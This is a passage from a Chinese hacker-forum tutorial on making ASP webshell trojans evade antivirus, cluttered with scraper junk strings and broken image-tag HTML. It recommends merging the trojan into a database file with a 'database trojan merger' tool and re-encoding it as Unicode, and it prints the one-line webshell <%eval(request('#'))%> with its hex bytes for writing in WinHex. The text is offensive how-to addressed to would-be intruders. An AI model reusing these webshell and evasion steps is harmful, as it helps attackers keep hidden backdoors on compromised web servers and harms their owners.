3.其他方法免杀
tech.techweb.com.cn/c8v:G,C#S.~8c7e'E
以上两种免杀方法都是比较传统的,但是作为一个合格的黑客,就要做到不走寻常路!要知道最好的方法永远都还未出现!所以要学会怀疑,学会探索。下面我就为大家介绍一下其它的免杀方法。
0E2o1w5z.ttech.techweb.com.cn(1)数据库合并法
/B-f!C ^1C#y8I8_8p程序开发,操作系统,服务器,源码下载,Linux,Unix,BSD,PHP,Apach,asp,下载,源码,黑客,安全,技术社区,技术论坛根据题目就可以看得出来,我们是通过将asp木马与数据库合并到一起来达到免杀的目的。但是为什么与数据库合并到一起就能起到免杀的作用呢?我们都知道现在的病毒木马多的不计其数,种类也是多种多样,就拿我们大家所熟悉的木马来说,就分为脚本木马与可执行文件木马这两种。大家有兴趣的话可以试试,我们就算将木马的后缀名改掉依然会被查杀!有的朋友要问了,改完后缀名连Windows都认不出来了,可杀毒软件为什么依然认得出来?这是因为杀毒软件是靠文件头来确认文件性质的,其实这也不是多复杂的功能,例如我们的CMD就有这个功能,只是没杀毒软件强大而以。
;B7S0}-m7sTechWeb-技术社区而一般的杀毒软件为了提高扫描速度会给病毒归类,例如如果扫到一个脚本,就会用脚本类病毒库里的特征码进行扫描,扫倒可执行文件时就用可执行文件病毒库里的特征码进行扫描。看到这大家也许都明白了,如果我们把asp木马与数据库合并到一起的话,那么杀毒软件就会将这个文件当作数据库文件来扫描,从而调用针数据库文件的病毒库,所以达到免杀的目的。明白原理后操作就简单了。这里我给大家推荐一个叫做“数据库木马合并器”的工具,它使得我们的免杀操作更加简便,而且省去了新建数据库的烦恼。
)]2J*A:Y0Q7l)x9^$_,f"fTechWeb-技术社区“数据库木马合并器”的使用方法很简单,只要选择我们的木马程序,然后点击“合并”按钮(如图10)。
TechWeb-技术社区9w/H;`:@,|!n$o:f*c*I9X
0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.width;}}" onmousewheel="return imgzoom(this);" οnmοuseοver="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.style.cursor='hand'; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" οnclick="if(!this.resized) {return true;} else {window.open(this.src);}" alt="" src="http://www.anqn.com/pic/10/1982991210927223650.jpg" οnlοad="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" border=0>
然后选择保存路径即可完成工作(如图11)。是不是简单的很?
/d9Q!h7u+E2^![
0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.width;}}" onmousewheel="return imgzoom(this);" οnmοuseοver="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.style.cursor='hand'; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" οnclick="if(!this.resized) {return true;} else {window.open(this.src);}" alt="" src="http://www.anqn.com/pic/10/2605332384434418541.jpg" οnlοad="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" border=0>
(2)UNICOAD法
'{;B9i2E/rTechWeb-技术社区除此之外,我们还可以使用UNICOAD编码将木马变形,而且操作方法十份方便,甚至连额外的工具都不用!大家看我操作。
&G2@/P&U.O程序开发,操作系统,服务器,源码下载,Linux,Unix,BSD,PHP,Apach,asp,下载,源码,黑客,安全,技术社区,技术论坛我们先新建一个文本文档,然后按[Ctrl]+[O]快捷键,在弹出窗口中的“文件类型”下拉框中选择“所有文件”,然后在“编码”下拉框中选择“Unicode”(如图12)。
4@1o+r1q(h5e'T
0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.width;}}" onmousewheel="return imgzoom(this);" οnmοuseοver="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.style.cursor='hand'; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" οnclick="if(!this.resized) {return true;} else {window.open(this.src);}" alt="" src="http://www.anqn.com/pic/10/1982991210927223656.jpg" οnlοad="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" border=0>
最后打开我们的一句话木马,效果如图13所示。
4F:h8K4D&R
0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.width;}}" onmousewheel="return imgzoom(this);" οnmοuseοver="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.style.cursor='hand'; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" οnclick="if(!this.resized) {return true;} else {window.open(this.src);}" alt="" src="http://www.anqn.com/pic/10/327355397915106603.jpg" οnlοad="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" border=0>
我们先将其复制,然后关闭文本文档在重新将其打开,并将这段字符复制进去,开始保存后也许会出现一个对话框(如图14),我们选“是”即可,不过就我的经验来看,如果出现这个对话框,那么保存的代码就一定会出现问题。就这样,我们的木马变形便完成了。
5@#v4v)p9I%J-V
0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.width;}}" onmousewheel="return imgzoom(this);" οnmοuseοver="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.style.cursor='hand'; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" οnclick="if(!this.resized) {return true;} else {window.open(this.src);}" alt="" src="http://www.anqn.com/pic/10/3383047745085807701.jpg" οnlοad="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" border=0>
另外需要注意的是,使用这个方法时我们要注意,如果保存后出现“?”号是不可以的。
&n.|8[(X3W"o/D#Q9mTechWeb-技术社区但是如果出现以上情况我们该怎么办呢?首先我针对出现如图14提示框的情况给大家讲一下解决办法。
$W+F9?1M0a
如果出现提示框后我们常规保存出现了问题,那么我们在在重新保存一次,当提示框出现时先点击“否”,此时会弹出一个对话框,叫我们选择文件另存为的路径。我们这时先把下面的编码换为“UNICOAD”型(如图15),然后我们在进行保存,一般情况下就可以解决问题。
TechWeb-技术社区#h0_7{3K @3v3t*G-X
0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.width;}}" onmousewheel="return imgzoom(this);" οnmοuseοver="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.style.cursor='hand'; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" οnclick="if(!this.resized) {return true;} else {window.open(this.src);}" alt="" src="http://www.anqn.com/pic/10/2053922905058140457.jpg" οnlοad="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" border=0>
除此之外我们还可以用WINHEX帮忙,这里我给大家提供一句话木马<%eval(request("#"))%>的16进制编码,
%q;H"r$k2Z8H&Z;n/M&EFF FE 3C 25 65 76 61 6C 28 72 65 71 75 65 73 74 28 22 23 22 29 29 25 3E
+v(V2q8N:O%{.i2g程序开发,操作系统,服务器,源码下载,Linux,Unix,BSD,PHP,Apach,asp,下载,源码,黑客,安全,技术社区,技术论坛我们先新建个文本文档,然后按快捷键[Ctrl]+[O]找到新建的文档,并用WINHEX将其打开(如图16)。
-_"E%]-Z*q8x程序开发,操作系统,服务器,源码下载,Linux,Unix,BSD,PHP,Apach,asp,下载,源码,黑客,安全,技术社区,技术论坛
0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.width;}}" onmousewheel="return imgzoom(this);" οnmοuseοver="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.style.cursor='hand'; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" οnclick="if(!this.resized) {return true;} else {window.open(this.src);}" alt="" src="http://www.anqn.com/pic/10/4298967319302410058.jpg" οnlοad="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" border=0>
然后将上面的16进制代码输入到WINHEX里(如图17),最后按快捷键[Ctrl]+[S]保存即可。
.g2p$E(w,c#x8G;e程序开发,操作系统,服务器,源码下载,Linux,Unix,BSD,PHP,Apach,asp,下载,源码,黑客,安全,技术社区,技术论坛
0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.width;}}" onmousewheel="return imgzoom(this);" οnmοuseοver="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.style.cursor='hand'; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" οnclick="if(!this.resized) {return true;} else {window.open(this.src);}" alt="" src="http://www.anqn.com/pic/10/1143632830376054589.jpg" οnlοad="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" border=0>